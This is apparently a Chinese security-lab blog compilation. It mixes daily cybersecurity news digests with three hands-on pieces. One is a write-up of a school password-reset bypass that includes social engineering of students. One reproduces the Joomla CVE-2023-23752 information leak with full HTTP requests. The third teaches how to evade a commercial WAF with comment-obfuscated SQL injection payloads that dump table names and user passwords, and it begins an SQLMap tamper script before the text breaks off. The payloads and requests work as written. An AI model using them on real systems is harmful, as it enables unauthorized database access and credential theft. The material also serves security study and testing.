网络安全日报 2023年03月01日
1、研究人员发现WordPress插件存在两个严重漏洞 https://www.bleepingcomputer.com/news/security/critical-flaws-in-wordpress-houzez-theme-exploited-to-hijack-websites/ Patchstack的威胁研究人员Dave Jong发现,黑客正在积极利用Houzez主题和WordPress插件中的两个严重漏洞,这两个插件主要用于房地产网站。第一个Houzez漏洞被追踪为CVE-2023-26540,其严重等级为9.8(满分10.0)。这是一个影响Houzez主题插件2.7.1及更早版本的安全配置错误,可以在不需要身份验证的情况下远程利用 2、CISA警告称ZK Java Web框架的高严重性漏洞被积极利用 https://thehackernews.com/2023/02/cisa-issues-warning-on-active.html 美国网络安全和基础设施安全局 (CISA) 根据主动利用的证据,将一个影响ZK框架的高严重性漏洞添加到其已知被利用漏洞(KEV)目录中。该漏洞被跟踪为CVE-2022-36537(CVSS分数:7.5),影响ZK框架版本9.6.1、9.6.0.1、9.5.1.3、9.0.1.2和8.6.4.1,并允许威胁参与者通过特制的请求检索敏感信息。该漏洞已于2022年5月在版本9.6.2、9.6.0.2、9.5.1.4、9.0.1.3和8.6.4.2中进行了修补。N 3、美国法警署证实遭遇重大安全漏洞敏感信息泄露 https://www.nbcnews.com/politics/politics-news/major-us-marshals-service-hack-compromises-sensitive-info-rcna72581 多名美国高级执法官员周一表示,美国法警署(U.S. Marshals Service)在一个多星期前遭遇安全漏洞,泄露了敏感信息。在周一的一份声明中,美国法警署发言人Drew Wade承认了这一违规行为,并表示:“受影响的系统包含执法敏感信息,包括法律程序的申报、行政信息以及与美国法警署调查对象有关的个人身份信息,其中还包含法警署的员工。”Wade称该事件发生在2月 4、重磅!《数字中国建设整体布局规划》发布 https://www.freebuf.com/news/358940.html 近日,中共中央、国务院印发了《数字中国建设整体布局规划》(以下简称《规划》),并发出通知,要求各地区各部门结合实际认真贯彻落实。 5、卡巴斯基报告显示:2022年手机银行木马数量暴涨100% https://www.freebuf.com/news/358895.html 2月27日,卡巴斯基公布的《2022 年移动威胁》显示,去年出现了近20万个新型手机银行木马,比前一年增长了 100%,达到了近六年来的最快增幅。 6、IDC:网络安全AI投资进入爆发期 https://www.secrss.com/articles/52284 根据IDC的预测,未来五年网络安全AI市场的复合年增长率为23.6%,2027年市值将达到463亿美元。 7、荷兰警方拘捕3名参与大规模数据盗窃和勒索计划的黑客 https://thehackernews.com/2023/02/dutch-police-arrest-3-hackers-involved.html 当地时间27日消息,荷兰警方宣布逮捕三名与涉及数据盗窃、勒索和洗钱的“大规模”犯罪行动有关的人。 8、Bitdefender 发布MortalKombat勒索软件解密器 https://thehackernews.com/2023/02/bitdefender-releases-free-decryptor-for.html Bitdefender发布了一款免费解密器,适用于名为MortalKombat的新型勒索软件。MortalKombat 是 2023 年 1 月出现的一种新勒索软件变种。它基于名为 Xorist 的商品勒索软件,在针对美国、菲律宾、英国和土耳其实体的攻击中被观察到。 9、新的 EX-22 工具使黑客能够对企业进行隐蔽的勒索软件攻击 https://thehackernews.com/2023/02/new-ex-22-tool-empowers-hackers-with.html 一种名为 EXFILTRATOR-22(又名 EX-22)的新后利用框架已经出现,其目标是在企业网络中部署勒索软件,同时具有高度隐蔽性。 10、TPM 2.0 规范中的安全缺陷使设备易受代码执行攻击 https://www.securityweek.com/security-defects-in-tpm-2-0-spec-raise-alarm-bells/ Quarkslab 的安全研究人员在可信平台模块 (TPM) 2.0 参考库规范中发现了一对严重的安全缺陷,促使跨供应商开展大规模工作来识别和修补易受攻击的安装。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年02月28日
1、国家网信办发布《个人信息出境标准合同办法》 https://www.freebuf.com/news/358759.html 2月24日,国家互联网信息办公室公布《个人信息出境标准合同办法》(以下简称《办法》),自2023年6月1日起施行。 2、PlugX RAT 伪装成合法的 Windows 工具进行分发 https://securityaffairs.com/142770/malware/plugx-trojan-disguised-windows-tool.html 趋势科技发现了新一波攻击,旨在分发 伪装成名为 x32dbg 的开源 Windows 调试器工具的PlugX 远程访问木马。合法工具允许检查内核模式和用户模式代码、故障转储或 CPU 寄存器。 研究人员分析的x32dbg.exe具有有效的数字签名,因此某些安全工具认为它是安全的。它的使用允许威胁行为者避免检测、保持持久性、提升权限和绕过文件执行限制。 3、ChromeLoader 活动使用 VHD 文件伪装成破解游戏和盗版软件 https://securityaffairs.com/142740/cyber-crime/chromeloader-malware-vhd-files.html Ahnlab 安全应急响应中心 ( ASEC ) 的研究人员最近发现了一个使用 VHD 文件分发ChromeLoader 的恶意软件活动。ChromeLoader 是一种恶意的 Chrome 浏览器扩展程序,它被归类为一种普遍存在的浏览器劫持程序,可以修改浏览器设置以重定向用户流量。这些 VHD 文件伪装成流行的任天堂和 Steam 游戏的应用程序和破解或破解,包括 ELDEN RING、黑暗之魂 3、荒野大镖客救赎 2、使命召 4、LastPass 称 DevOps 工程师家用电脑被黑 https://www.securityweek.com/lastpass-says-devops-engineer-home-computer-hacked/ 密码管理软件公司 LastPass 表示,其一名 DevOps 工程师的个人家用电脑遭到黑客攻击并植入了键盘记录恶意软件,这是持续性网络攻击的一部分,从云存储资源中窃取了公司数据。 5、PureCrypter 恶意软件以亚太地区和北美的政府实体为目标 https://thehackernews.com/2023/02/purecrypter-malware-targets-government.html 亚太地区和北美的政府实体正成为未知威胁行为者的目标,该威胁行为者使用名为 PureCrypter 的现成恶意软件下载器来提供一系列信息窃取程序和勒索软件。 6、美国石油生产商Encino Energy遭勒索软件攻击 https://therecord.media/encino-energy-cyberattack-alleged-data-leak-alphv/ Encino Energy是美国最大的私人天然气和石油生产商之一,该公司表示已调查并修复了最近网络攻击造成的影响。上周早些时候,ALPHV勒索软件团伙将该公司添加到其数据泄露网站。Encino Energy发言人Jackie Stewart说:“ Encino Energy之前就意识到了未经授权的活动,调查了该行动并对问题进行了补救。我们的业务没有受到影响,我们将继续照常运营。”该公司是俄亥俄州最大的石油生产商,没有透露攻击发生的时间,也不清楚 7、研究人员发现钓鱼邮件冒充航运公司窃取用户凭据 https://asec.ahnlab.com/en/48304/ AHNLAB安全紧急响应中心最近发现,冒充航运公司的恶意电子邮件正在韩国传播。这些电子邮件提示用户打开主题为“提交进口清关信息”的附加文件。附件的HTML文件是一个登录页面,当用户尝试登录时,登录页面会将他们输入的密码发送到攻击者的服务器。之后,用户将被定向至上传到个人OneDrive Cloud Storage帐户的Excel文件。但是连接到该链接的Excel文件无法打开,因为它超过了文件大小限制。连接到Excel文件的屏幕旨在欺骗用户,使用户很难立即意识到他们在输入帐户凭据后信息被窃取。 8、数百个 Docker 容器镜像中隐藏漏洞,下载量高达数十亿次 https://www.helpnetsecurity.com/2023/02/23/hidden-vulnerabilities-docker-containers/ Rezilion 发现了数百个 Docker 容器镜像的存在,这些镜像包含了大多数标准漏洞扫描器和 SCA 工具都没有检测到的漏洞。 9、美国电视广播巨头Dish Network遭网络攻击,网站、应用程序离线 https://www.freebuf.com/news/358788.html 美国电视巨头和卫星广播供应商Dish Network在过去24小时内神秘断网,其网站和应用程序停止运作。大范围的中断影响了Dish.com、Dish Anywhere应用程序以及该公司拥有的几个网站和网络。同时该公司的呼叫中心电话也无法接通。此外,客户在通过他们的Dish凭证登录MTV和Starz等电视频道应用程序时面临认证问题。Dish Network的远程员工已经也被禁止访问其工作系统。 10、假亚马逊 Prime 电子邮件滥用 LinkedIn 的 URL 缩短器 https://www.malwarebytes.com/blog/news/2023/02/linkedin-slinks-abused-to-phish-email-and-payment-details 在过去的几天里,诈骗者一直在发送网络钓鱼电子邮件,这些电子邮件用一种叫做 Slinks 的东西伪装虚假 URL——缩短的 Linkedin URL。现在,它们被用于基于亚马逊广受欢迎的 Prime 会员资格的骗局。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
SRC挖掘之Access验证校验的漏洞挖掘
漏洞已修复,感谢某大佬的知识分享。 任意用户密码重置->可获取全校师生个人mingan信息 开局就是信息收集。 对于挖掘edu的信息收集 1.可尝试谷歌搜索语法,获取学号信息 2. 旁站的渗透获取 3. 学校的贴吧获取(大部分都是本校学生) 当然我就是闲,进了目标学校的贴吧,跟他们聊天,然后你懂的(不推荐这样去做) 类似于钓鱼吧 再获取到学号的信息,自然就是水到渠成。 由于权限太小,功能点太少,fuzz不到接口,j也没有mingan接口,越权就更不存在了。 放弃了,去看看找回密码吧。 先爆破一波账号是否存在(能不用别人账号就不用) 123456账号存在 找回密码这里随便输入3个必选项,然后提交。 尝试更改返回包,看看是不是只有前端校验。 果然跟我想的一样,回到输入账号处了。 那没办法了,咱还是得用关系,用好大哥的账号,然后再从他个人信息里面掏点东西过验证。 重置成功了,但发现一个不对劲的地方,仔细想想发现有机会可以绕过。 首先,Newpass参数是加密的重置密码,也就是123456。 Post发包就一个参数,还是密码。 通过排除法能判定 Access-Reset-Ticket是校验用户 一开始我是不信的,CAS校验应该是这样的 本来TGT是CAS为用户签发的登录票据,拥有了TGT,用户就可以证明自己在CAS成功登录过。 这些直接大缩水呢。 但又没登录 怎么获取的当前用户的Access-Reset-Ticket? 真相只有一个,看看接口哪里获取到的 原来是在输入要找回的用户,就会获取当前用户的Access-Reset-Ticket 6到了,开发是我大哥! 尝试修改 可行,修改管理员账号,然后起飞。 下机。 漏洞是已修复,厂商也修复了漏洞更新到了最新版本。
网络安全日报 2023年02月27日
1、黑客利用虚假ChatGPT应用程序来分发恶意软件 https://www.bleepingcomputer.com/news/security/hackers-use-fake-chatgpt-apps-to-push-windows-android-malware/ 安全研究员Dominic Alvieri发现,威胁行为者正在利用OpenAI的ChatGPT聊天机器人的热度来分发适用于Windows和Android的恶意软件,或将毫无戒心的受害者引导至网络钓鱼页面。钓鱼网站由Facebook页面推广,该页面使用官方ChatGPT徽标来诱骗用户重定向到恶意站点,用Redline信息窃取恶意软件感染访问者。研究人员还发现了在谷歌Play和第三 2、水果巨头都乐食品公司遭到勒索软件攻击影响运营 https://www.bleepingcomputer.com/news/security/fruit-giant-dole-suffers-ransomware-attack-impacting-operations/ 新鲜水果蔬菜生产商和分销商都乐食品公司(Dole Food Company)宣布,该公司正在应对影响其运营的勒索软件攻击。目前还没有多少细节,该公司目前正在调查“事件的范围”,并指出影响有限。尽管都乐将影响描述为“有限”,但德克萨斯州一家杂货店在Facebook上泄露的一份便笺显示,这家食品巨头被迫关闭了其在北美的生产工厂。都乐似乎也停止了向杂货店发货。该便笺还提到,都乐 3、谷歌发布更新修复了Chrome浏览器中的RCE漏洞 https://www.scmagazine.com/news/vulnerability-management/google-critical-rce-bug-chrome-browser 谷歌修补了其Chrome网络浏览器中一个严重的远程代码执行漏洞,该漏洞允许攻击者通过欺骗受害者访问恶意网站,就能在受害者的系统上安装恶意软件。作为其Chrome浏览器2月份安全更新的一部分,谷歌还修补了6个高严重性漏洞,其中一个已存在将近一年。 4、攻击者通过Discord分发恶意软件针对政府实体 https://www.menlosecurity.com/blog/purecrypter-targets-government-entities-through-discord/ Menlo Labs发现了一个未知的威胁行为者,该行为者利用通过Discord分发的规避威胁活动,该活动以PureCrypter下载器为特征,并以政府实体为目标。PureCrypter活动使用一个受感染的非营利组织的域作为命令和控制(C2)来提供第二个有效载荷。研究人员调查发现,该活动传播了多种类型的恶意软件,包括Redline Stealer、AgentTesla、Eternity、Blackmoon和Phi 5、11个国家参加了西欧最大军事网络演习DCM2 https://www.securityweek.com/11-countries-take-part-in-military-cyberwarfare-exercise/ 西欧最大的军事网络演习Defense Cyber Marvel 2(DCM2)最近在爱沙尼亚举行,共有来自11个国家的34支队伍参加了这场网络演习。美国、英国、日本、印度、意大利、爱沙尼亚、乌克兰、加纳、肯尼亚和阿曼等国家派出750名专家参加。这场为期七天的活动由英国陆军领头,测试了参与者对常见和复杂网络场景的反应,包括对网络和工业控制系统(ICS)的攻击。参赛队伍相互竞争,并根据他们识别和应对网络威胁的速度进行评判。来 6、Android应用程序数据安全标签存在漏洞 https://thehackernews.com/2023/02/majority-of-android-apps-on-google-play.html Mozilla基金会调查发现,谷歌Play商店中可用的Android应用程序的数据安全标签存在“严重漏洞”,这些漏洞允许应用程序提供误导性或完全虚假的信息。该项调查比较了应用市场上20个最受欢迎的付费应用和20个最受欢迎的免费应用的隐私政策和标签,大约80%的被审查应用程序中,“由于应用程序的隐私政策与应用程序在谷歌数据安全表格上自我报告的信息之间的差异,这些标签是虚假的或具有误导性的。”Mozilla表示,消费者正在被引导“相信这些应 7、洛杉矶联合学区遭到黑客攻击暴露学生记录 https://www.govtech.com/security/l-a-unified-hack-exposed-2k-student-records-officials-say 洛杉矶联合学区上周三透露,由于最近的一次网络攻击,“大约2000名学生的评估记录”被发布在暗网上,其中包括目前在读的60名学生的评估记录。泄露的记录还包括数量不详的驾照号码和社会安全号码。学区声明说:“我们已经通知了一些受到这次攻击影响的个人和供应商,并将在确定后继续通知个人。”并补充道:“其中一些记录可以追溯到近30年前,这造成了进一步耗时的分析。我们的审查还显示,COVID-19阳性检测结果也是违规行为的一部 8、新的“Clasiopa”威胁组织以材料研究组织为目标 https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research 观察到一个迄今未知的攻击组织以亚洲的一家材料研究组织为目标。该组织被赛门铁克称为 Clasiopa,其特点是具有独特的工具集,其中包括一个自定义恶意软件 (Backdoor.Atharvan)。目前,没有确凿的证据表明 Clasiopa 位于何处或代表谁行事。 9、俄罗斯广播电台遭匿名者组织入侵播放虚假警告 https://www.hackread.com/russia-hacked-radio-station-missile-alerts/ 本周三上午,俄罗斯十几个城市的数百万公民听到了不寻常的无线电警报、警报器声还收到警告短信。这些警告是关于对俄罗斯的导弹袭击和空袭。然而,俄罗斯政府紧急情况部后来宣布这些是虚假警告,并指责黑客在商业广播电台播放虚假警报。据当地媒体报道,一个女声从几家电台发出了虚假警报,包括Yumor FM、Relax FM、Comedy Radio、Humor FM和Avatoradio。虚假警告宣布空袭,并要求听众迅速寻求庇护。匿名者黑客组织发布的一条推文称,他们扰乱了俄 10、加拿大第二大电信公司TELUS遭数据泄露 https://www.bleepingcomputer.com/news/security/telus-investigating-leak-of-stolen-source-code-employee-data/ 加拿大第二大电信公司TELUS正在调查一起潜在的数据泄露事件。2月17日,一名威胁行为者在数据泄露论坛上发布了他们声称的TELUS员工名单(包括姓名和电子邮件地址)以供出售。该帖子称“TELUS的员工信息最近被泄露。我们有超过7600封唯一的电子邮件,除此之外,我们还有从TELUS的API中获取的与每位员工相关的内部信息。”截至2月21日,同一个威胁行为者创建了另一个论坛帖子, 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
Joomla未授权访问漏洞(CVE-2023-23752)
漏洞简介      在 Joomla! 版本为4.0.0 到 4.2.7中发现了一个漏洞,在Joomla受影响的版本中由于对Web服务端点的访问限制不当,远程攻击者可以绕过安全限制获得Web应用程序敏感信息。 影响版本   4.0.0 <= Joomla <= 4.2.7 环境搭建   文件下载地址 https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.zip?format=zip   利用 phpstudy 搭建漏洞环境   我们利用 phpstudy 来搭建环境,选择 Apache2.4.39 + MySQL5.7.26+ php7.4.3 ,同时利用 PhpStorm 来实现对项目的调试      安装完成后   前台      后台    漏洞复现   构造路由 /api/index.php/v1/config/application?public=true   返回了数据库的相关信息       漏洞分析   经过调试分析发现是对 api 路径下的身份校验进行了绕过,默认在未登录的情况下访问 返回 {"errors":[{"title":"Forbidden"}]}   所以就针对于 api 路径下的身份校验进行具体分析    api/index.php       api/includes/app.php       \Joomla\CMS\Application\CMSApplication::execute       \Joomla\CMS\Application\ApiApplication::doExecute      其中的 $this->route(); 对应了路由应用程序    \Joomla\CMS\Application\ApiApplication::route          $router 对应了 api 下所有的路由信息,之后调用 parseApiRoute 对路由进行处理    \Joomla\CMS\Router\ApiRouter::parseApiRoute         当 public 为false 时,是禁止外部访问的 GET /api/index.php/v1/config/application HTTP/1.1 Host: joomla.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie:XDEBUG_SESSION=PHPSTORM Connection: close      ‍   但是通过路径传入的值在之后可以覆盖替换原本的值    GET /api/index.php/v1/config/application?public=true HTTP/1.1 Host: joomla.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie:XDEBUG_SESSION=PHPSTORM Connection: close   ‍      ‍
网络安全日报 2023年02月24日
1、Fortinet FortiNAC 漏洞PoC 发布后的几个小时内被利用 https://securityaffairs.com/142621/hacking/fortinet-fortinac-cve-2022-39952-exploitation.html 本周,Horizon3 网络安全公司的研究人员发布了针对 Fortinet 的 FortiNAC 网络访问控制解决方案中严重漏洞的PoC,该漏洞被跟踪为CVE-2022-39952 。在 PoC 漏洞利用代码发布几个小时后,威胁参与者正在积极利用 Fortinet FortiNAC 漏洞 CVE-2022-39952。 2、欧盟委员会称出于安全考虑,已禁止其员工使用 TikTok https://securityaffairs.com/142615/breaking-news/european-commission-banned-tiktok.html 3、思科修补 ACI 组件中的高危漏洞 https://www.securityweek.com/cisco-patches-high-severity-vulnerabilities-in-aci-components/ 思科周三通知客户有关影响其应用程序中心基础设施 (ACI) 软件定义网络解决方案组件的两个高严重性漏洞的补丁程序的可用性。 4、网络犯罪分子通过盗版应用程序传播Mac 恶意软件 https://www.securityweek.com/stealthy-mac-malware-delivered-via-pirated-apps/ 网络犯罪分子正在使用盗版应用程序向 Mac 用户传播隐蔽的挖矿恶意软件,他们可以对其他恶意软件使用相同的方法。合法的 Mac 软件应用程序被恶意软件木马化并上传到盗版软件网站。软件盗版者从这里下载应用程序并在不知不觉中感染自己。 5、新的 S1deload 恶意软件劫持用户的社交账户并进行挖矿 https://thehackernews.com/2023/02/new-s1deload-malware-hijacking-users.html 一项活跃的恶意软件活动通过利用新的信息窃取程序劫持帐户并滥用系统资源来挖掘加密货币,将目光投向了 Facebook 和 YouTube 用户。Bitdefender 将恶意软件称为S1deload Stealer,因为它使用DLL 侧面加载技术来绕过安全防御并执行其恶意组件。 6、拥有500W安装量的语音聊天应用OyeTalk泄露了用户聊天记录 https://www.hackread.com/android-voice-chat-app-data-leak/ 流行的 Android 语音聊天应用程序 OyeTalk 泄露了私人用户数据,包括他们未加密的聊天记录、用户名和手机国际移动设备识别码 (IMEI) 号码。该应用程序在Google Play上的下载量超过 500 万次。 7、Python开发人员警告木马化PyPI包冒充流行库 https://www.reversinglabs.com/blog/beware-impostor-http-libraries-lurk-on-pypi ReversingLabs研究人员警告称,恶意包模仿了Python Package Index(PyPI)存储库中可用的流行库。已发现41个恶意PyPI包伪装成合法模块(如HTTP、AIOHTTP、requests、urllib和urllib3)的错别字变体。在大多数情况下,这些软件包的描述并没有暗示它们的恶意,有些伪装成真正的库,并将它们的功能与已知的合法HTTP库的功能进行比较。但实际上,这些恶意包可能包含下载程序,充当向受感染主机 8、2022 年,谷歌向安全研究人员支付了 1200 万美元漏洞赏金 https://www.freebuf.com/articles/358421.html Bleeping Computer 网站披露,2022 年,谷歌通过漏洞奖励计划支付了有史以来最高的漏洞奖金,为安全研究人员报告的 2900 多个漏洞,支付超 1200 万美元。 9、Activision 确认数据泄露暴露了员工信息和游戏信息 https://www.bleepingcomputer.com/news/security/activision-confirms-data-breach-exposing-employee-and-game-info/ Activision 已确认,在黑客通过使用 SMS 网络钓鱼文本欺骗员工获得对公司内部系统的访问权限后,在 2022 年 12 月上旬遭受了数据泄露。 10、因担心数据安全,摩根大通限制员工使用ChatGPT https://www.secrss.com/articles/52175 2月23日消息,据外媒报道,华尔街大行摩根大通已下令限制其员工使用ChatGPT这一AI技术驱动的智能聊天机器人。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年02月23日
1、亚洲最大的两家数据中心遭黑客入侵,影响阿里、华为等2000多家企业 https://www.freebuf.com/news/358395.html 据彭博社报道,亚洲最大的两家数据中心(中国上海的万国数据服务有限公司(GDS Holdings Ltd. “万国数据”)与总部位于新加坡的新科电信媒体国际数据中心)遭遇黑客组织入侵,并悄悄潜伏其中近2年时间。在如此漫长的时间里,两大数据中心没有任何发现,而黑客却早已掌握已掌握了大量企业的亚洲数据中心登录凭证。影响范围包括阿里巴巴、腾讯、华为、苹果、微软、亚马逊、沃尔玛、高盛、宝马等国际巨头在内的2000多家企业。 2、《全球安全倡议概念文件》发布,多项涉及网络安全 https://www.freebuf.com/news/358362.html 2月21日,外交部长秦刚出席“全球安全倡议:破解安全困境的中国方案”蓝厅论坛开幕式并发表主旨演讲。秦刚指出,中方正式发布《全球安全倡议概念文件》(以下简称《概念文件》),阐释倡议的核心理念和原则,明确重点合作方向和平台机制,展现中方对维护世界和平的责任担当、对守护全球安全的坚定决心。其中,网络安全被多次提及。 3、挪威当局查获 Lazarus 黑客窃取的 584 万美元加密货币 https://thehackernews.com/2023/02/norway-seizes-584-million-in.html 挪威警察局 Økokrim 宣布,在 Axie Infinity Ronin Bridge 遭到黑客攻击后,没收了 Lazarus Group 在 2022 年 3 月窃取的价值 6000 万挪威克朗(约合 584 万美元)的加密货币。 4、2022年大多数勒索软件攻击都利用了旧漏洞 https://www.darkreading.com/attacks-breaches/dozens-of-vulns-in-ransomware-attacks-offer-adversaries-full-kill-chain Ivanti 的一份新报告透露,勒索软件组织在2022年总共利用了 344 个独特漏洞,其中竟有 76% 的漏洞来自 2019 年或之前。 5、Activision证实数据泄露暴露了员工和游戏信息 https://www.bleepingcomputer.com/news/security/activision-confirms-data-breach-exposing-employee-and-game-info/ 电子游戏发行商Activision证实,该公司在2022年12月初遭遇数据泄露,黑客通过向一名员工发送钓鱼短信,获取了公司内部系统的访问权限。Activision发言人表示“经过彻底调查,我们确定没有敏感的员工数据、游戏代码或玩家数据被访问”。然而,安全研究小组vx-underground表示,威胁行为者“泄露了敏感的工作场所文件”以及日期直到2023年11月17日的内容 6、Apple发布更新修复了iOS、iPadOS和 macOS的三个漏洞 https://securityaffairs.com/142581/security/apple-three-vulnerabilities.html Apple 通过添加三个新漏洞更新了公告,这些漏洞被跟踪为 CVE-2023-23520、CVE-2023-23530 和 CVE-2023-23531,影响 iOS、iPadOS和 macOS。攻击者可以触发 CVE-2023-23530 漏洞以在其沙箱之外或以某些提升的权限执行任意代码。该漏洞存在于 Foundation 框架中,由 Trellix ARC 的 Austin Emmitt 报告。该公司通过发布 iOS 16.3、iPad 7、R1Soft服务器备份管理器漏洞被利用部署后门 https://www.securityweek.com/r1soft-server-backup-manager-vulnerability-exploited-to-deploy-backdoor/ 去年在 ConnectWise 的 R1Soft 服务器备份管理器软件中发现的一个漏洞已被利用在数百台服务器上部署后门。 2022 年 10 月下旬,ConnectWise 通知客户,Recover 和 R1Soft Server Backup Manager 产品中修补了 一个严重漏洞,可能允许攻击者执行任意代码或直接访问机密数据。 8、域名注册商 GoDaddy 透露,它已遭入侵长达三年之久 https://cyware.com/news/hackers-ran-amok-across-godaddy-for-three-years-593339da 互联网域名注册商 GoDaddy 最近宣布其基础设施遭到网络攻击,据信这是可追溯到 2020 年的一系列更大规模事件的一部分。 9、谷歌将通过固件强化来提高 Android 的安全性 https://www.bleepingcomputer.com/news/security/google-will-boost-android-security-through-firmware-hardening 谷歌已开始致力于在固件级别加强 Android 的安全性,固件级别是软件堆栈的一个组件,可直接与片上系统 (SoC) 的各种处理器交互。 10、CISA在已知被利用漏洞目录中增加了3个漏洞 https://thehackernews.com/2023/02/us-cybersecurity-agency-cisa-adds-three.html 周二,美国网络安全和基础设施安全局(CISA)根据主动利用漏洞的证据,在其已知被利用漏洞(KEV)目录中添加了三个安全漏洞。CVE-2022-47986是IBM Aspera Faspex代码执行漏洞,被描述为文件传输解决方案中的YAML反序列化漏洞,该漏洞可能允许远程攻击者在系统上执行代码。CISA还添加了两个影响Mitel MiVoice Connect的漏洞(CVE-2022-41223和CVE-2022-40765),这两个漏洞 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
教你编写SQLMap的Tamper脚本过狗
测试环境 最新版某狗 测试方法 安全狗其实是比较好绕的WAF,绕过方法很多,但这里我们就用一种:注释混淆 一招鲜吃遍天下 注释混淆,其实就是在敏感位置添加垃圾字符注释,常用的垃圾字符有/、!、*、%等 这里再解释一下内联注释,因为后面要用到: MySQL内联注释: /*!xxxxxxx*/ !后面的语句会当作SQL语句直接执行 但是如果!后面跟着MySQL版本号,那么就会出现两种情况 1. 当!后面接的数据库版本号小于自身版本号,就会将注释中的内容执行 2. 当!后面接的数据库版本号大于等于自身版本号,就会当做注释来处理。 数据库版本号以五位数字表示,比如当前环境下数据库版本号表示为:50553 !后面接小于50553的: 执行了select 1; !后面接大于等于50553的: 执行了 select ; 下面进入正题 bypass and and 1=1拦 但是把空格删掉就不拦了 所以,我们认为,and后面不能直接跟空格... 那么如果用其他形式表示空格呢? 前面说了,我们这次只使用注释混淆: burp,抓包设置 长度5335是被拦截的 长度为899的说明成功绕过 我们选择其中一个作为空格的替代者就好了,这里我们选择/*%* 即:->/*/*%**/ 同理 ,or是一样的: order by 测试发现还是只要替换order by中间的空格就可以了,所以绕过方法和前面一样: union select union select使用之前的垃圾字符替换空格发现不行了: 但是先不急于换方法,再爆破一遍试试: 发现又有很多可以绕过的了。 所以我们再更改一下替换空格的垃圾字符, 这里选/*/!%!/*/ 即:->/*/!%!/*/ 获得当前数据库 正常语句: ?id=-1 union select 1,database(),3 --+ 绕过: 即:()->(/*/!%!/*/) 获取数据库中的表 正常语句: ?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ 绕过: 经过测试发现拦截的是select + from + information_schema的组合 中间加垃圾字符替换空格已经不管用了,我们尝试对关键字进行混淆。 对information_schema进行混淆测试: 首先使用内联注释,发现,这里的版本号不管写啥,都直接被拦。 考虑是检测了select + from + /*! + information_schema的组合 加个换行试试 还是不行... 那既然都换行了,那我们再在换行前加一些垃圾字符: 如果我们直接插入垃圾字符,会当作SQL语句执行,所以前面还需要在垃圾字符前加个注释,可以是 /**/或#或--+ 但是经过测试只有 --+好用 有这么多可以绕过的,我们随便选择一个,比如/*%/ 这样,最终语句如下: ?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,group_concat(table_name),3/*/!%!/*/from/*/!%!/*//*!00000--+/*%/%0ainformation_schema.tables*/%20where%20table_schema=database(/*/!%!/*/)--%20+ 获取表字段 正常语句: ?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+ 绕过语句: ?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,group_concat(column_name),3/*/!%!/*/from/*/!%!/*//*!00000--+/*%/%0ainformation_schema.columns*/%20where%20table_name=0x7573657273--%20+ 获取字段信息 ?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,/*/!%!/*/group_concat(username,0x2f,password),3/*/!%!/*/from/*/!%!/*/users 成功。 编写tamper 当我们下载了SQLMap,解压后,我们可以找到文件夹【tamper】,该文件夹有很多个Tamper脚本帮助我们绕过一些安全防护: 网上有很多相关脚本的介绍,我就不一一介绍了。 虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个时候就需要我们针对目标的防护体系构建相应的Tamper脚本。 Tamper相当于一个加工车间,它会把我们的Payload进行加工之后发往目标网站。 我们随便打开一个Tamper脚本看一下它的结构: #apostrophemask.py #!/usr/bin/env python """ Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ # 导入SQLMap中lib\core\enums中的PRIORITY优先级函数 from lib.core.enums import PRIORITY # 定义脚本优先级 __priority__ = PRIORITY.LOWEST # 对当前脚本的介绍 def dependencies():    pass ''' 对传进来的payload进行修改并返回 函数有两个参数。主要更改的是payload参数,kwargs参数用得不多。 ''' def tamper(payload, **kwargs):    """   Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)   References:       * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128       * 